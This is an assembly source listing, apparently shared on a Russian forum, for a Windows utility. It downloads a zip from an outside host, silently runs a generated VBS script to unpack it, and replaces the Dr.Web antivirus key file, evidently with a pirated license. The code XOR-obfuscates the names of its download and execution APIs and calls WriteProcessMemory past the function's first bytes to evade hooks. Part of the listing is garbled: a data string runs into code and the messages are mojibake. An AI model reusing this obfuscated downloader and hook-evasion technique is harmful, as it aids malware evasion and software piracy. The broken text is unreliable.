Код:
;написано и скомпилировано в assembler editor
;/thread261755-assembler+editor.html
.386
.model flat, stdcall
option casemap:none
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
Crypt proto :DWORD
include include\windows.inc
include include\kernel32.inc
include include\user32.inc
include include\comdlg32.inc
include include\shell32.inc
include include\ole32.inc
includelib lib\shell32.lib
includelib lib\ole32.lib
includelib lib\comdlg32.lib
includelib lib\user32.lib
includelib lib\kernel32.lib
chr$ MACRO any_text:VARARG
LOCAL txtname
.data
txtname db any_text,0
.code
EXITM
ENDM
.data
urldtf db '[\BJay`baojZaHgbkO',0
shlexc db ']fkbbKvkm{zkO',0
krnl32 db 'ek|`kb=0
call decrypt
call SetLib
push 0
push 0
push chr$("C:\key.zip")
push chr$("http://yootoo.ru/drweb32.zip")
push 0
call eax
.ENDIF
invoke Sleep,1000
invoke GetFileAttributes,chr$("C:\key.zip")
.IF eax==INVALID_FILE_ATTRIBUTES
invoke MessageBox,0,chr$("Íå óäàëîñü!"),chr$("Îøèáêà"),MB_ICONERROR
.ELSEIF eax!=INVALID_FILE_ATTRIBUTES
invoke MessageBox,0,chr$("OK!"),chr$("ÎK"),MB_OK
.ENDIF
.ENDIF
.ENDIF
.IF ax==Button5ID
shr eax,16
.IF ax==BN_CLICKED
invoke GetWindowTextLength,hwndEdit
.IF eax==0
invoke MessageBox,0,chr$("Îïðåäåëèòå äèðåêòîðèþ!"),chr$("Îøèáêà"),MB_ICONERROR
.ELSEIF eax>0
call create_script
invoke ShellExecute,0,chr$("open"),chr$("C:\unzip.vbs"),0,0,SW_HIDE
invoke lstrcat,addr txtbuff,chr$("\drweb32.key")
invoke GetFileAttributes,addr txtbuff
.IF eax!=INVALID_FILE_ATTRIBUTES
invoke MessageBox,0,chr$("Òåêóùèé êëþ÷ óäàëåí"),chr$("Ñîîáùåíèå"),MB_OK
invoke DeleteFile,addr txtbuff
.ENDIF
invoke MessageBox,0,addr txtbuff,chr$("ÓÑÏÅÕ!êëþ÷ ïîìåùåí â ïàïêó"),0
invoke MoveFile,addr path,addr txtbuff
.ENDIF
invoke DeleteFile,chr$("C:\drweb.key")
invoke DeleteFile,chr$("C:\key.zip")
invoke DeleteFile,chr$("C:\unzip.vbs")
.ENDIF
.ENDIF
.ENDIF
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
WndProc endp
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInst
pop wc.hInstance
mov wc.hbrBackground,COLOR_BTNFACE+1
mov wc.lpszMenuName,OFFSET MenuName
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
INVOKE CreateWindowEx,WS_EX_CLIENTEDGE,ADDR ClassName,ADDR AppName,\
WS_SYSMENU,CW_USEDEFAULT,\
CW_USEDEFAULT,210,170,NULL,NULL,\
hInst,NULL
mov hwnd,eax
INVOKE ShowWindow, hwnd,SW_SHOWNORMAL
INVOKE UpdateWindow, hwnd
.WHILE TRUE
INVOKE GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
get_dir proc
invoke CoInitialize,0
invoke SHBrowseForFolder,ADDR dirs
mov pv,eax
invoke SHGetPathFromIDList,pv,ADDR txtbuff
invoke CoTaskMemFree,pv
cmp pv,0
ret
get_dir endp
call_bk proc hWnd:DWORD,uMsg:DWORD,lParam:DWORD,lpData:DWORD
.if uMsg == BFFM_INITIALIZED
invoke SendMessage,hWnd,BFFM_SETSELECTION,TRUE,lpData
.endif
xor eax,eax
ret
call_bk endp
create_script proc
invoke CreateFile,chr$("C:\unzip.vbs"), GENERIC_READ or GENERIC_WRITE,0,0, CREATE_NEW, FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
invoke WriteFile,hFile,addr unzip,sizeof unzip-1,addr htemp,0
invoke CloseHandle,hFile
ret
create_script endp
Crypt proc s:dword
invoke lstrlen,s
mov ecx,eax
xor eax,eax
mov eax,s
l1:
xor [eax],0Eh
inc eax
loop l1
ret
Crypt endp
decrypt proc
LOCAL nob:dword
LOCAL buff:byte
mov eax,addr nob
push eax
mov buff,1111b
mov eax,addr buff
push eax
mov eax,lp
inc eax
invoke GetCurrentProcess
push eax
mov eax,WriteProcessMemory ; IAT
mov eax,[eax+2] ; .idata
mov eax,[eax] ; kernel32.WriteProcessMemory
add eax,5 ; kernel32.WriteProcessMemory+5
push l2 ; emulate first instruction
push ebp ; emulate second instruction
mov ebp,esp ; emulate third instruction
jmp eax ; JMP to kernel32.WriteProcessMemory+5
l2:
lp:
invoke Crypt,addr urldtf
invoke Crypt,addr krnl32
invoke Crypt,addr urlmon
ret
decrypt endp
SetLib proc
invoke LoadLibrary,addr urlmon
invoke GetProcAddress,eax,addr urldtf
ret
SetLib endp
end start